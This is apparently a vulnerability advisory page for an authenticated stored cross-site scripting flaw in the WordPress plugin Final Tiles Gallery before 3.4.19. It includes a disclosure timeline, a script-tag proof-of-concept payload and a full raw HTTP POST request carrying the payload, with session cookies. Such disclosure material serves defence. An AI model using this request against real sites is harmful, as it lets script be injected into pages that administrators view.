Lucene search
Ngo Van ThienWPEX-ID:D597A4A6-FDD1-4629-9F4F-6B7A9114C65AHistoryMay 28, 2020 - 12:00 a.m.
Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)
2020-05-2800:00:00
Ngo Van Thien
29
0.001 Low
EPSS
Percentile
31.2%
Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user (author+) to inject arbitrary javascript code into a post using the gallery which is viewed by admin and other users. Timeline (WPScanTeam): May 14th, 2020 - Issue confirmed, Vendor Contacted (via https://www.machothemes.com/contact-us-now/) and given 14 days for a response before escalating to WP plugins team. May 27th, 2020 - v3.4.19 released, fixing the issue.
#XSS TRIGGER POINT: When an admin or authenticated user load contents of gallery or post with Shortcode embed: [FinalTilesGallery id='3']
https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
https://[WP]/2020/05/13/site-review/
Add an image to a gallery from the plugin, then put the payload <script>alert(/XSS/)</script> in the Title and Caption fields.
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Origin: http://example.com
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7
source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0Related
prion
prion
Cross site scripting
2020-06-22 00:15:00
patchstack
patchstack
cvelist
cvelist
CVE-2020-14962
2020-06-21 23:04:15
wpvulndb
wpvulndb
nvd
nvd
CVE-2020-14962
2020-06-22 00:15:10
cve
cve
CVE-2020-14962
2020-06-22 00:15:10